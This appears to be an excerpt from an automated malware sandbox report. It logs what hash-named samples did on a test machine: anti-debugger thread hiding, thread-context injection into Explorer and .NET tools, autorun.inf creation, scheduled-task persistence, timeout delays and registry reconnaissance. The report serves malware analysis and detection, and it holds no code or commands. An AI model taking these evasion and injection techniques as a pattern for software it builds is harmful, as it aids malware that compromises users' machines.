File created D:\autorun.inf C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
File created F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
File opened for modification F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2860 set thread context of 4952 N/A C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
PID 2656 set thread context of 4172 N/A C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 4652 set thread context of 3376 N/A C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
PID 4672 set thread context of 3876 N/A C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
PID 5092 set thread context of 2516 N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe
PID 2516 set thread context of 3232 N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe C:\Windows\Explorer.EXE
PID 4948 set thread context of 4248 N/A C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2516 set thread context of 3232 N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe C:\Windows\Explorer.EXE
PID 1044 set thread context of 3232 N/A C:\Windows\SysWOW64\systray.exe C:\Windows\Explorer.EXE
PID 1844 set thread context of 2084 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe
PID 1532 set thread context of 2928 N/A C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Desktop\2023-09-04\3659096c23b68f66ca65f00e41c47a3b0642b48240cd8b92143f8b6dc90ead82.exe

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe = "0" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe = "0" C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\SniffedFolderType = "Documents" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e80922b16d365937a46956b92703aca08af260001002600efbe11000000b32dd5d24fdcd90124472bd55adcd90124472bd55adcd90114000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000020000000300000000000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "14" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1\0 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe N/A
